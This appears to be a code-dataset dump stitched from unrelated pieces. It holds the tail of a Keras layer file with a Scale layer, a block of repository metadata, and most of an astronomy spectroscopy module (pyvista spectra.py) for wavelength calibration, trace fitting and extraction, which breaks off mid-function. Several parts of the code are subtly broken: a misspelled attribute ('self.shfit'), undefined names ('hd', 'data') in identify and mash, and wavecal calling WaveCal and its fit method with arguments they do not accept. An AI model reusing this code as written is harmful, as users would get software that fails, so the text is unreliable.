config = super(Blur2D, self).get_config()
config.update({
'filter_size': self.filter_size,
'strides': self.strides,
'padding': self.padding,
})
return config
class Scale(Layer):
"""Layer to learn a affine feature scaling.
"""
def __init__(self,
use_shift=True,
use_scale=True,
shift_initializer='zeros',
shift_regularizer=None,
shift_constraint=None,
scale_initializer='ones',
scale_regularizer=None,
scale_constraint=None,
**kwargs):
super(Scale, self).__init__(**kwargs)
self.use_shift = use_shift
self.use_scale = use_scale
self.shift_initializer = initializers.get(shift_initializer)
self.shift_regularizer = regularizers.get(shift_regularizer)
self.shift_constraint = constraints.get(shift_constraint)
self.scale_initializer = initializers.get(scale_initializer)
self.scale_regularizer = regularizers.get(scale_regularizer)
self.scale_constraint = constraints.get(scale_constraint)
def compute_output_shape(self, input_shape):
return input_shape
def build(self, input_shape):
if self.use_shift:
self.shift = self.add_variable(name='shift',
shape=(input_shape[-1],),
initializer=self.shift_initializer,
regularizer=self.shift_regularizer,
constraint=self.shift_constraint,
trainable=True,
dtype=self.dtype)
else:
self.shfit = None
if self.use_scale:
self.scale = self.add_variable(name='scale',
shape=(input_shape[-1],),
initializer=self.scale_initializer,
regularizer=self.scale_regularizer,
constraint=self.scale_constraint,
trainable=True,
dtype=self.dtype)
else:
self.scale = None
super(Scale, self).build(input_shape)
def call(self, inputs, **kwargs):
x = inputs
if self.use_scale:
x = tf.multiply(x, self.scale)
if self.use_shift:
x = tf.add(x, self.shift)
return x
def get_config(self):
config = super(Scale, self).get_config()
config.update({
'use_shift': self.use_shift,
'use_scale': self.use_scale,
'shift_initializer': initializers.serialize(self.shift_initializer),
'shift_regularizer': regularizers.serialize(self.shift_regularizer),
'shift_constraint': constraints.serialize(self.shift_constraint),
'scale_initializer': initializers.serialize(self.scale_initializer),
'scale_regularizer': regularizers.serialize(self.scale_regularizer),
'scale_constraint': constraints.serialize(self.scale_constraint),
})
return config
| 39.869314
| 146
| 0.559264
| 6,467
| 55,219
| 4.615123
| 0.090459
| 0.027139
| 0.013603
| 0.011392
| 0.536521
| 0.493701
| 0.456611
| 0.437513
| 0.409201
| 0.392515
| 0
| 0.022491
| 0.335718
| 55,219
| 1,384
| 147
| 39.898121
| 0.791173
| 0.176878
| 0
| 0.541758
| 0
| 0
| 0.02182
| 0.000495
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079121
| false
| 0
| 0.008791
| 0.004396
| 0.156044
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee88b24eca82ddcab181129272a9f62d15dd7605
| 36,064
|
py
|
Python
|
external/pyvista/python/pyvista/spectra.py
|
dnidever/apogee
|
83ad7496a0b4193df9e2c01b06dc36cb879ea6c1
|
[
"BSD-3-Clause"
] | 5
|
2019-04-11T13:35:24.000Z
|
2019-11-14T06:12:51.000Z
|
external/pyvista/python/pyvista/spectra.py
|
dnidever/apogee
|
83ad7496a0b4193df9e2c01b06dc36cb879ea6c1
|
[
"BSD-3-Clause"
] | null | null | null |
external/pyvista/python/pyvista/spectra.py
|
dnidever/apogee
|
83ad7496a0b4193df9e2c01b06dc36cb879ea6c1
|
[
"BSD-3-Clause"
] | 5
|
2018-09-20T22:07:43.000Z
|
2021-01-15T07:13:38.000Z
|
import matplotlib
import matplotlib.pyplot as plt
import os
import pdb
import pickle
import copy
import scipy.signal
import scipy.interpolate
import numpy as np
from astropy.modeling import models, fitting
from astropy.nddata import CCDData, StdDevUncertainty
from astropy.io import ascii, fits
from astropy.convolution import convolve, Box1DKernel, Box2DKernel
import pyvista
from pyvista import image
from pyvista import tv
from tools import plots
ROOT = os.path.dirname(os.path.abspath(__file__)) + '/../../'
class SpecData(CCDData) :
""" Class to include a wavelength array on top of CCDData, with simple read/write/plot methods
"""
def __init__(self,data,wave=None) :
if type(data) is str :
hdulist=fits.open(data)
self.meta = hdulist[0].header
self.unit = hdulist[0].header['BUNIT']
self.data = hdulist[1].data
self.uncertainty = StdDevUncertainty(hdulist[2].data)
self.mask = hdulist[3].data
self.wave = hdulist[4].data
elif type(data) is CCDData :
self.unit = data.unit
self.meta = data.meta
self.data = data.data
self.uncertainty = data.uncertainty
self.mask = data.mask
self.wave = wave
else :
print('Input must be a filename or CCDData object')
def write(self,file,overwrite=True) :
hdulist=fits.HDUList()
hdulist.append(fits.PrimaryHDU(header=self.meta))
hdulist.append(fits.ImageHDU(self.data))
hdulist.append(fits.ImageHDU(self.uncertainty.array))
hdulist.append(fits.ImageHDU(self.mask.astype(np.int16)))
hdulist.append(fits.ImageHDU(self.wave))
hdulist.writeto(file,overwrite=overwrite)
def plot(self,ax,**kwargs) :
for row in range(self.wave.shape[0]) :
gd = np.where(self.mask[row,:] == False)[0]
plots.plotl(ax,self.wave[row,gd],self.data[row,gd],**kwargs)
def get_wavecal(file) :
""" load a wavecal object from disk file
"""
with open(file,'rb') as wavecal :
return pickle.load(wavecal)
class WaveCal() :
""" Class for wavelength solutions
"""
def __init__ (self,type='chebyshev',degree=2,ydegree=2,pix0=0,orders=[1]) :
""" Initialize the wavecal object
type : type of solution ('poly' or 'chebyshev')
degree : polynomial degree for wavelength
ydegree : polynomial degree for y dimension
pix0 : reference pixel
orders : spectral order for each row
spectrum : spectrum from which fit is derived
"""
self.type = type
self.degree = degree
self.ydegree = ydegree
self.pix0 = pix0
self.orders = orders
self.waves = None
self.x = None
self.y = None
self.weights = None
self.model = None
self.ax = None
def wave(self,pixels=None,image=None) :
""" Wavelength from pixel using wavelength solution model
pix : input pixel positions [x] or [y,x]
image : for input image size [nrows,ncols], return wavelengths at all pixels
returns wavelength
"""
if pixels is not None :
out=np.zeros(len(pixels[0]))
for i,pixel in enumerate(pixels[0]) :
if self.type.find('2D') > 0 :
order=self.orders[pixels[1][i]]
out[i]=self.model(pixel-self.pix0,pixels[1][i])/order
else :
out[i]=self.model(pixel-self.pix0)/self.orders[0]
return out
else :
out=np.zeros(image)
cols=np.arange(out.shape[-1])
if out.ndim == 2 :
for row in range(out.shape[0]) :
rows=np.zeros(len(cols))+row
try : order = self.orders[row]
except : order=self.orders[0]
out[row,:] = self.model(cols-self.pix0,rows)/order
else :
out= self.model(cols-self.pix0)/self.orders[0]
return out
def getmod(self) :
""" Return model for current attributes
"""
if self.type == 'poly' :
mod=models.Polynomial1D(degree=self.degree)
elif self.type == 'chebyshev' :
mod=models.Chebyshev1D(degree=self.degree)
elif self.type == 'chebyshev2D' :
sz=self.spectrum.data.shape
mod=models.Chebyshev2D(x_degree=self.degree,y_degree=self.ydegree,
x_domain=[0,sz[1]],y_domain=[0,sz[0]])
else :
raise ValueError('unknown fitting type: '+self.type)
return
return mod
def fit(self,plot=True) :
""" do a wavelength fit
"""
print("doing wavelength fit")
# set up fitter and model
twod='2D' in self.type
fitter=fitting.LinearLSQFitter()
mod = self.getmod()
if not hasattr(self,'ax') : self.ax = None
if twod :
nold=-1
nbd=0
while nbd != nold :
nold=nbd
self.model=fitter(mod,self.pix-self.pix0,self.y,self.waves*self.waves_order,weights=self.weights)
diff=self.waves-self.wave(pixels=[self.pix,self.y])
gd = np.where(self.weights > 0)[0]
print(' rms: {:8.3f}'.format(diff[gd].std()))
bd = np.where(abs(diff) > 3*diff.std())[0]
nbd = len(bd)
print('rejecting {:d} points from {:d} total: '.format(nbd,len(self.waves)))
self.weights[bd] = 0.
if self.ax is not None :
self.ax[1].cla()
scat=self.ax[1].scatter(self.waves,diff,marker='o',c=self.y,s=2)
scat=self.ax[1].scatter(self.waves[bd],diff[bd],marker='o',c='r',s=2)
xlim=self.ax[1].get_xlim()
self.ax[1].set_ylim(diff.min()-0.5,diff.max()+0.5)
self.ax[1].plot(xlim,[0,0],linestyle=':')
self.ax[1].text(0.1,0.9,'rms: {:8.3f}'.format(diff[gd].std()),transform=self.ax[1].transAxes)
cb_ax = self.fig.add_axes([0.94,0.05,0.02,0.4])
cb = self.fig.colorbar(scat,cax=cb_ax)
cb.ax.set_ylabel('Row')
plt.draw()
self.fig.canvas.draw_idle()
input(' See 2D wavecal fit. Hit any key to continue....')
else :
self.model=fitter(mod,self.pix-self.pix0,self.waves*self.waves_order,weights=self.weights)
diff=self.waves-self.wave(pixels=[self.pix])
print(' rms: {:8.3f} Angstroms'.format(diff.std()))
if self.ax is not None :
# iterate allowing for interactive removal of points
done = False
ymax = self.ax[0].get_ylim()[1]
while not done :
# do fit
gd=np.where(self.weights>0.)[0]
bd=np.where(self.weights<=0.)[0]
self.model=fitter(mod,self.pix[gd]-self.pix0,self.waves[gd]*self.waves_order[gd],weights=self.weights[gd])
diff=self.waves-self.wave(pixels=[self.pix])
print(' rms: {:8.3f} Anstroms'.format(diff[gd].std()))
# replot spectrum with new fit wavelength scale
self.ax[0].cla()
self.ax[0].plot(self.wave(image=self.spectrum.data.shape)[0,:],self.spectrum.data[0,:])
# plot residuals
self.ax[1].cla()
self.ax[1].plot(self.waves[gd],diff[gd],'go')
self.ax[1].text(0.1,0.9,'rms: {:8.3f} Angstroms'.format(diff[gd].std()),transform=self.ax[1].transAxes)
self.ax[1].set_xlabel('Wavelength')
self.ax[1].set_ylabel('obs wave - fit wave')
if len(bd) > 0 : self.ax[1].plot(self.waves[bd],diff[bd],'ro')
self.ax[1].set_ylim(diff[gd].min()-0.5,diff[gd].max()+0.5)
for i in range(len(self.pix)) :
self.ax[1].text(self.waves[i],diff[i],'{:2d}'.format(i),va='top',ha='center')
if self.weights[i] > 0 :
self.ax[0].plot([self.waves[i],self.waves[i]],[0,ymax],'g')
else :
self.ax[0].plot([self.waves[i],self.waves[i]],[0,ymax],'r')
plt.draw()
# get input from user on lines to remove
for i in range(len(self.pix)) :
print('{:3d}{:8.2f}{:8.2f}{:8.2f}{:8.2f}'.format(
i, self.pix[i], self.waves[i], diff[i], self.weights[i]))
i = input(' enter ID of line to remove (-n for all lines<n, +n for all lines>n, O for new degree, return to continue): ')
if i == '' :
done = True
elif i == 'O' :
print(' current degree of fit: {:d}'.format(self.degree))
self.degree = int(input(' enter new degree of fit: '))
mod = self.getmod()
elif '+' in i :
self.weights[int(i)+1:] = 0.
elif '-' in i :
self.weights[0:abs(int(i))] = 0.
elif int(i) >= 0 :
self.weights[int(i)] = 0.
else :
print('invalid input')
def set_spectrum(self,spectrum) :
""" Set spectrum used to derive fit
"""
self.spectrum = np.atleast_2d(spectrum)
def get_spectrum(self) :
""" Set spectrum used to derive fit
"""
return self.spectrum
def identify(self,spectrum,file=None,wav=None,wref=None,disp=None,display=None,plot=None,rad=5,thresh=10,
xmin=None, xmax=None, lags=range(-300,300), nskip=1) :
""" Given some estimate of wavelength solution and file with lines,
identify peaks and centroid
"""
sz=spectrum.shape
if len(sz) == 1 :
spectrum.data = np.atleast_2d(spectrum.data)
spectrum.uncertainty.array = np.atleast_2d(spectrum.uncertainty.array)
sz=spectrum.shape
if xmin is None : xmin=0
if xmax is None : xmax=sz[-1]
nrow=sz[0]
# get initial reference wavelengths if not given
if wav is None :
pix=np.arange(sz[-1])
if self.spectrum is not None :
# cross correlate with reference image to get pixel shift
print(' cross correlating with reference spectrum using lags: ', lags)
fitpeak,shift = image.xcorr(self.spectrum.data,spectrum.data,lags)
if shift.ndim == 1 :
pixshift=(fitpeak+lags[0])[0]
print(' Derived pixel shift from input wcal: ',fitpeak+lags[0])
if display is not None :
display.plotax1.cla()
display.plotax1.text(0.05,0.95,'spectrum and reference',transform=display.plotax1.transAxes)
for row in range(spectrum.data.shape[0]) :
display.plotax1.plot(spectrum.data[row,:],color='m')
display.plotax1.plot(self.spectrum.data[row,:],color='g')
display.plotax1.set_xlabel('Pixel')
display.plotax2.cla()
display.plotax2.text(0.05,0.95,'cross correlation: {:8.3f}'.format(pixshift),
transform=display.plotax2.transAxes)
display.plotax2.plot(lags,shift)
display.plotax1.set_xlabel('Lag')
plt.draw()
input(" See spectrum and template spectrum (top), cross corrleation(bottom). hit any key to continue")
# single shift for all pixels
self.pix0 = self.pix0+fitpeak+lags[0]
wav=np.atleast_2d(self.wave(image=np.array(sz)))
else :
# different shift for each row
wav=np.zeros(sz)
cols = np.arange(sz[-1])
orders=[]
for row in range(wav.shape[0]) :
print(' Derived pixel shift from input wcal for row: {:d} {:d}'.format
(row,shift[row,:].argmax()+lags[0]),end='\r')
rows=np.zeros(len(cols))+row
try : order = self.orders[row]
except : order=self.orders[0]
orders.append(order)
pix0 = self.pix0+fitpeak[row]+lags[0]
wav[row,:] = self.model(cols-pix0)/order
# ensure we have 2D fit
self.type = 'chebyshev2D'
self.orders = orders
print("")
else :
# get dispersion guess from header cards if not given in disp
if disp is None: disp=hd.header['DISPDW']
if wref is not None :
w0=wref[0]
pix0=wref[1]
else:
w0=hd.header['DISPWC']
pix0=sz[1]/2
wav=np.atleast_2d(w0+(pix-pix0)*disp)
# open file with wavelengths and read
if file is not None :
f=open(ROOT+'/data/lamps/'+file,'r')
lines=[]
for line in f :
if line[0] != '#' :
w=float(line.split()[0])
# if we have microns, convert to Angstroms
if w<10 : w*=10000
if w > wav.min() and w < wav.max() : lines.append(w)
lines=np.array(lines)
f.close()
else :
lines = self.waves
weights = self.weights
gd = np.where(weights >0)[0]
lines = lines[gd]
# get centroid around expected lines
x=[]
y=[]
waves=[]
waves_order=[]
weight=[]
diff=[]
if display is not None and isinstance(display,pyvista.tv.TV) :
display.ax.cla()
display.ax.axis('off')
display.tv(spectrum.data)
if plot is not None :
if type(plot) is matplotlib.figure.Figure :
plot.clf()
plt.draw()
ax1=plot.add_subplot(2,1,1)
ax2=plot.add_subplot(2,1,2,sharex=ax1)
plot.subplots_adjust(left=0.05,right=0.92, hspace=1.05)
ax=[ax1,ax2]
self.fig = plot
self.ax = ax
else :
fig,ax = plt.subplots(2,1,sharex=True,figsize=(14,7))
fig.subplots_adjust(hspace=1.05)
self.fig = fig
self.ax = ax
if plot is not None : ax[0].cla()
for row in range(0,nrow,nskip) :
print(' identifying lines in row: ', row,end='\r')
if plot is not None :
ax[0].plot(wav[row,:],spectrum.data[row,:])
#ax[0].set_yscale('log')
ax[0].set_ylim(1.,ax[0].get_ylim()[1])
ax[0].text(0.1,0.9,'row: {:d}'.format(row),transform=ax[0].transAxes)
ax[0].set_xlabel('Rough wavelength')
ax[0].set_ylabel('Intensity')
for line in lines :
peak=abs(line-wav[row,:]).argmin()
if isinstance(display,pyvista.tv.TV) :
if (peak > xmin+rad) and (peak < xmax-rad) : display.ax.scatter(peak,row,marker='o',color='r',s=2)
if ( (peak > xmin+rad) and (peak < xmax-rad) and
((spectrum.data[row,peak-rad:peak+rad]/spectrum.uncertainty.array[row,peak-rad:peak+rad]).max() > thresh) ) :
cent = (spectrum.data[row,peak-rad:peak+rad]*np.arange(peak-rad,peak+rad)).sum()/spectrum.data[row,peak-rad:peak+rad].sum()
peak = int(cent)
cent = (spectrum.data[row,peak-rad:peak+rad]*np.arange(peak-rad,peak+rad)).sum()/spectrum.data[row,peak-rad:peak+rad].sum()
if display is not None and isinstance(display,pyvista.tv.TV) :
display.ax.scatter(cent,row,marker='o',color='g',s=2)
if plot is not None :
ax[0].text(line,1.,'{:7.1f}'.format(line),rotation='vertical',va='top',ha='center')
x.append(cent)
y.append(row)
# we will fit for wavelength*order
waves.append(line)
try: order = self.orders[row]
except: order=self.orders[0]
waves_order.append(order)
weight.append(1.)
if plot is not None :
if self.model is not None :
# if we have a solution already, see how good it is (after shift)
diff=self.wave(pixels=[x,y])-np.array(waves)
ax[1].cla()
ax[1].scatter(np.array(waves),diff,s=2,c=y)
ax[1].text(0.1,0.9,'from previous fit, rms: {:8.3f}'.format(diff.std()),transform=ax[1].transAxes)
xlim=ax[1].get_xlim()
ax[1].plot(xlim,[0,0],linestyle=':')
ax[1].set_ylim(diff.min()-0.5,diff.max()+0.5)
print(" rms from old fit (with shift): {:8.3f}".format(diff.std()))
plt.figure(plot.number)
plt.draw()
input(' See identified lines. hit any key to continue....')
self.pix=np.array(x)
self.y=np.array(y)
self.waves=np.array(waves)
self.waves_order=np.array(waves_order)
self.weights=np.array(weight)
self.spectrum = spectrum
print('')
def scomb(self,hd,wav,average=True,usemask=True) :
""" Resample onto input wavelength grid
"""
#output grid
out=np.zeros(len(wav))
sig=np.zeros(len(wav))
mask=np.zeros(len(wav),dtype=bool)
# raw wavelengths
w=self.wave(image=np.array(np.atleast_2d(hd.data).shape))
for i in range(np.atleast_2d(hd).shape[0]) :
sort=np.argsort(w[i,:])
if usemask :
gd = np.where(~hd.mask[i,sort])
sort= sort[gd]
wmin=w[i,sort].min()
wmax=w[i,sort].max()
w2=np.abs(wav-wmin).argmin()
w1=np.abs(wav-wmax).argmin()
if average :
out[w2:w1] += ( np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.data)[i,sort]) /
np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.uncertainty.array)[i,sort])**2 )
sig[w2:w1] += 1./np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.uncertainty.array)[i,sort])**2
else :
out[w2:w1] += np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.data)[i,sort])
sig[w2:w1] += np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.uncertainty.array**2)[i,sort])
if average :
out = out / sig
else :
sig = np.sqrt(sig)
return CCDData(out,uncertainty=StdDevUncertainty(sig),mask=mask,header=hd.header,unit='adu')
def save(self,file) :
""" Save object to file
"""
try : delattr(self,'fig')
except: pass
try : delattr(self,'ax')
except: pass
f=open(file,'wb')
pickle.dump(self,f)
f.close()
class Trace() :
""" Class for spectral traces
"""
def __init__ (self,inst=None, type='poly',order=2,pix0=0,rad=5,spectrum=None,model=None,sc0=None,rows=None,lags=None,channel=None) :
self.type = type
self.order = order
self.pix0 = pix0
self.spectrum = spectrum
self.rad = rad
if inst == 'TSPEC' :
self.order = 3
self.rows = [[135,235],[295,395],[435,535],[560,660],[735,830]]
self.lags = range(-75,75)
elif inst == 'DIS' :
if channel == 0 : self.rows=[[215,915]]
elif channel == 1 : self.rows=[[100,800]]
else : raise ValueError('need to specify channel')
self.lags = range(-300,300)
elif inst == 'ARCES' :
self.lags = range(-10,10)
if rows is not None : self.rows=rows
if lags is not None : self.lags=lags
if model is not None : self.model=model
if sc0 is not None : self.sc0=sc0
def trace(self,hd,srows,sc0=None,plot=None,thresh=20) :
""" Trace a spectrum from starting position
"""
fitter=fitting.LinearLSQFitter()
if self.type == 'poly' :
mod=models.Polynomial1D(degree=self.order)
else :
raise ValueError('unknown fitting type: '+self.type)
return
nrow = hd.data.shape[0]
ncol = hd.data.shape[1]
if sc0 is None : self.sc0 = int(ncol/2)
else : self.sc0 = sc0
self.spectrum = hd[:,self.sc0]
self.spectrum.data[self.spectrum.data<0] = 0.
rows = np.arange(nrow)
ypos = np.zeros(ncol)
ysum = np.zeros(ncol)
yvar = np.zeros(ncol)
ymask = np.zeros(ncol,dtype=bool)
# we want to handle multiple traces, so make sure srows is iterable
if type(srows ) is int or type(srows) is float : srows=[srows]
oldmodel=copy.copy(self.model)
self.model=[]
if plot is not None :
plot.clear()
plot.tv(hd)
rad = self.rad-1
for irow,srow in enumerate(srows) :
print(' Tracing row: {:d}'.format(int(srow)),end='\r')
sr=copy.copy(srow)
sr=int(round(sr))
sr=hd.data[sr-rad:sr+rad+1,self.sc0].argmax()+sr-rad
# march left from center
for col in range(self.sc0,0,-1) :
# centroid
cr=sr-rad+hd.data[sr-rad:sr+rad+1,col].argmax()
ysum[col] = np.sum(hd.data[cr-rad:cr+rad+1,col])
ypos[col] = np.sum(rows[cr-rad:cr+rad+1]*hd.data[cr-rad:cr+rad+1,col]) / ysum[col]
yvar[col] = np.sum(hd.uncertainty.array[cr-rad:cr+rad+1,col]**2)
ymask[col] = np.any(hd.mask[cr-rad:cr+rad+1,col])
# if centroid is too far from starting guess, mask as bad
if np.abs(ypos[col]-sr) > rad/2. : ymask[col] = True
# use this position as starting center for next if above threshold S/N
if (not ymask[col]) & np.isfinite(ysum[col]) & (ysum[col]/np.sqrt(yvar[col]) > thresh) : sr=int(round(ypos[col]))
sr=copy.copy(srow)
sr=int(round(sr))
sr=hd.data[sr-rad:sr+rad+1,self.sc0].argmax()+sr-rad
# march right from center
for col in range(self.sc0+1,ncol,1) :
# centroid
cr=sr-rad+hd.data[sr-rad:sr+rad+1,col].argmax()
ysum[col] = np.sum(hd.data[cr-rad:cr+rad+1,col])
ypos[col] = np.sum(rows[cr-rad:cr+rad+1]*hd.data[cr-rad:cr+rad+1,col]) / ysum[col]
yvar[col] = np.sum(hd.uncertainty.array[cr-rad:cr+rad+1,col]**2)
ymask[col] = np.any(hd.mask[cr-rad:cr+rad+1,col])
if np.abs(ypos[col]-sr) > rad/2. : ymask[col] = True
# use this position as starting center for next if above threshold S/N
if (not ymask[col]) & np.isfinite(ysum[col]) & (ysum[col]/np.sqrt(yvar[col]) > thresh) : sr=int(round(ypos[col]))
cols=np.arange(ncol)
gd = np.where((~ymask) & (ysum/np.sqrt(yvar)>thresh) )[0]
model=(fitter(mod,cols[gd],ypos[gd]))
# reject outlier points (>1 pixel) and refit
res = model(cols)-ypos
gd = np.where((~ymask) & (ysum/np.sqrt(yvar)>thresh) & (np.abs(res)<1))[0]
model=(fitter(mod,cols[gd],ypos[gd]))
if len(gd) < 10 :
print(' failed trace for row: {:d}, using old model'.format(irow))
model=copy.copy(oldmodel[irow])
self.model.append(model)
if plot :
plot.ax.scatter(cols,ypos,marker='o',color='r',s=4)
plot.ax.scatter(cols[gd],ypos[gd],marker='o',color='g',s=4)
plot.ax.plot(cols,model(cols),color='m')
#plt.pause(0.05)
self.pix0=0
print("")
if plot : input(' See trace. Hit any key to continue....')
def retrace(self,hd,plot=None,thresh=20) :
""" Retrace starting with existing model
"""
self.find(hd)
srows = []
for row in range(len(self.model)) :
srows.append(self.model[row](self.sc0))
self.trace(hd,srows,plot=plot,thresh=thresh)
def find(self,hd,lags=None,plot=None) :
""" Determine shift from existing trace to input frame
"""
if lags is None : lags = self.lags
im=copy.deepcopy(hd.data)
# if we have a window, zero array outside of window
spec=im[:,self.sc0]
try:
spec[:self.rows[0]] = 0.
spec[self.rows[1]:] = 0.
except: pass
fitpeak,shift = image.xcorr(self.spectrum,spec,lags)
pixshift=(fitpeak+lags[0])[0]
print(' traces shift: ', fitpeak+lags[0])
if plot is not None :
plot.clear()
plot.tv(im)
plot.plotax1.cla()
plot.plotax1.text(0.05,0.95,'obj and ref cross-section',transform=plot.plotax1.transAxes)
plot.plotax1.plot(self.spectrum.data/self.spectrum.data.max())
plot.plotax1.plot(im[:,self.sc0]/im[:,self.sc0].max())
plot.plotax1.set_xlabel('row')
plot.plotax2.cla()
plot.plotax2.text(0.05,0.95,'cross correlation {:8.3f}'.format(pixshift),
transform=plot.plotax2.transAxes)
plot.plotax2.plot(lags,shift)
plot.plotax2.set_xlabel('lag')
plt.draw()
input(' See spectra and cross-correlation. Hit any key to continue....')
self.pix0=fitpeak+lags[0]
return fitpeak+lags[0]
def extract(self,hd,rad=None,scat=False,plot=None,medfilt=None) :
""" Extract spectrum given trace(s)
"""
if rad is None : rad=self.rad
nrows=hd.data.shape[0]
ncols=hd.data.shape[-1]
spec = np.zeros([len(self.model),hd.data.shape[1]])
sig = np.zeros([len(self.model),hd.data.shape[1]])
mask = np.zeros([len(self.model),hd.data.shape[1]],dtype=bool)
if plot is not None:
plot.clear()
plot.tv(hd)
for i,model in enumerate(self.model) :
print(' extracting aperture {:d}'.format(i),end='\r')
cr=model(np.arange(ncols))+self.pix0
icr=np.round(cr).astype(int)
rfrac=cr-icr+0.5 # add 0.5 because we rounded
rlo=[]
rhi=[]
for col in range(ncols) :
r1=icr[col]-rad
r2=icr[col]+rad
# sum inner pixels directly, outer pixels depending on fractional pixel location of trace
if r1>=0 and r2<nrows :
spec[i,col]=np.sum(hd.data[r1+1:r2,col])
sig[i,col]=np.sum(hd.uncertainty.array[r1+1:r2,col]**2)
spec[i,col]+=hd.data[r1,col]*(1-rfrac[col])
sig[i,col]+=hd.uncertainty.array[r1,col]**2*(1-rfrac[col])
spec[i,col]+=hd.data[r2,col]*rfrac[col]
sig[i,col]+=hd.uncertainty.array[r2,col]**2*rfrac[col]
sig[i,col]=np.sqrt(sig[i,col])
mask[i,col] = np.any(hd.mask[r1:r2+1,col])
if plot is not None :
rlo.append(r1)
rhi.append(r2-1)
if medfilt is not None :
boxcar = Box1DKernel(medfilt)
median = convolve(spec[i,:],boxcar,boundary='extend')
spec[i,:]/=median
sig[i,:]/=median
if plot is not None :
if i%2 == 0 : color='b'
else : color='m'
plot.ax.plot(range(ncols),cr,color='g',linewidth=3)
plot.ax.plot(range(ncols),rlo,color=color,linewidth=1)
plot.ax.plot(range(ncols),rhi,color=color,linewidth=1)
plt.draw()
if plot is not None : input(' See extraction window(s). Hit any key to continue....')
print("")
return CCDData(spec,uncertainty=StdDevUncertainty(sig),mask=mask,header=hd.header,unit='adu')
def extract2d(self,hd,rows=None,plot=None) :
""" Extract 2D spectrum given trace(s)
Assumes all requests row uses same trace, just offset, not a 2D model for traces
"""
nrows=hd.data.shape[0]
ncols=hd.data.shape[-1]
out=[]
if plot is not None:
plot.clear()
plot.tv(hd)
for model in self.model :
if plot is not None :
plot.ax.plot([0,ncols],[self.rows[0],self.rows[0]],color='g')
plot.ax.plot([0,ncols],[self.rows[1],self.rows[1]],color='g')
plt.draw()
outrows=np.arange(self.rows[0],self.rows[1])
noutrows=len(range(self.rows[0],self.rows[1]))
spec=np.zeros([noutrows,ncols])
sig=np.zeros([noutrows,ncols])
cr=model(np.arange(ncols))
cr-=cr[self.sc0]
for col in range(ncols) :
spec[:,col] = np.interp(outrows+cr[col],np.arange(nrows),hd.data[:,col])
sig[:,col] = np.sqrt(np.interp(outrows+cr[col],np.arange(nrows),hd.uncertainty.array[:,col]**2))
out.append(CCDData(spec,StdDevUncertainty(sig),unit='adu'))
if plot is not None: input(' enter something to continue....')
if len(out) == 1 : return out[0]
else : return out
def save(self,file) :
""" Save object to file
"""
try : delattr(self,'ax')
except: pass
f=open(file,'wb')
pickle.dump(self,f)
f.close()
def mash(hd,sp=None,bks=None) :
"""
Mash image into spectra using requested window
"""
if sp is None :
sp=[0,hd.data.shape[0]]
obj = hd.data[sp[0]:sp[1]].sum(axis=0)
obj = hd.data[sp[0]:sp[1]].sum(axis=0)
if bks is not None :
back=[]
for bk in bks :
tmp=np.median(data[bk[0]:bk[1]],axis=0)
back.append(tmp)
obj-= np.mean(back,axis=0)
return obj
def wavecal(hd,file=None,wref=None,disp=None,wid=[3],rad=5,snr=3,degree=2,wcal0=None,thresh=100,type='poly'):
"""
Get wavelength solution for single 1D spectrum
"""
# choose middle row +/ 5 rows
sz=hd.data.shape
spec=hd.data[int(sz[0]/2)-5:int(sz[0]/2)+5,:].sum(axis=0)
spec=spec-scipy.signal.medfilt(spec,kernel_size=101)
pix = np.arange(len(spec))
fig,ax = plt.subplots(2,1,sharex=True,figsize=(14,6))
ax[0].plot(spec)
# get wavelength guess from input WaveCal if given, else use wref and dispersion, else header
if wcal0 is not None :
lags=range(-300,300)
fitpeak,shift = image.xcorr(wcal0.spectrum,spec,lags)
wnew=copy.deepcopy(wcal0)
wnew.pix0 = wcal0.pix0+shift.argmax()+lags[0]
print(' Derived pixel shift from input wcal0: ',shift.argmax()+lags[0])
wav=wnew.wave(pix)
else :
# get dispersion guess from header cards if not given in disp
if disp is None: disp=hd.header['DISPDW']
if wref is not None :
w0=wref[0]
pix0=wref[1]
wav=w0+(pix-pix0)*disp
else:
w0=hd.header['DISPWC']
pix0=sz[1]/2
wav=w0+(pix-pix0)*disp
ax[1].plot(wav,spec)
# open file with wavelengths and read
f=open(file,'r')
lines=[]
for line in f :
if line[0] != '#' :
w=float(line.split()[0])
name=line[10:].strip()
lpix=abs(w-wav).argmin()
if lpix > 1 and lpix < sz[1]-1 :
ax[0].text(lpix,0.,'{:7.1f}'.format(w),rotation='vertical',va='top',ha='center')
lines.append(w)
lines=np.array(lines)
f.close()
# get centroid around expected lines
cents=[]
for line in lines :
peak=abs(line-wav).argmin()
if (peak > rad) and (peak < sz[1]-rad) and (spec[peak-rad:peak+rad].max() > thresh) :
print(peak,spec[peak-rad:peak+rad].max())
cents.append((spec[peak-rad:peak+rad]*np.arange(peak-rad,peak+rad)).sum()/spec[peak-rad:peak+rad].sum())
cents=np.array(cents)
print(' cents:', cents)
waves=[]
weight=[]
print(' Centroid W0 Wave')
for cent in cents :
w=wav[int(cent)]
ax[0].plot([cent,cent],[0,10000],'k')
print(' {:8.2f}{:8.2f}{:8.2f}'.format(cent, w, lines[np.abs(w-lines).argmin()]))
waves.append(lines[np.abs(w-lines).argmin()])
weight.append(1.)
waves=np.array(waves)
weight=np.array(weight)
# set up new WaveCal object
pix0 = int(sz[1]/2)
wcal = WaveCal(order=degree,type=type,spectrum=spec,pix0=pix0)
# iterate allowing for interactive removal of points
done = False
ymax = ax[0].get_ylim()[1]
while not done :
gd=np.where(weight>0.)[0]
bd=np.where(weight<=0.)[0]
wcal.fit(cents[gd],waves[gd],weights=weight[gd])
# plot
ax[1].cla()
ax[1].plot(cents[gd],wcal.wave(cents[gd])-waves[gd],'go')
if len(bd) > 0 : ax[1].plot(cents[bd],wcal.wave(cents[bd])-waves[bd],'ro')
diff=wcal.wave(cents[gd])-waves[gd]
ax[1].set_ylim(diff.min()-1,diff.max()+1)
for i in range(len(cents)) :
ax[1].text(cents[i],wcal.wave(cents[i])-waves[i],'{:2d}'.format(i),va='top',ha='center')
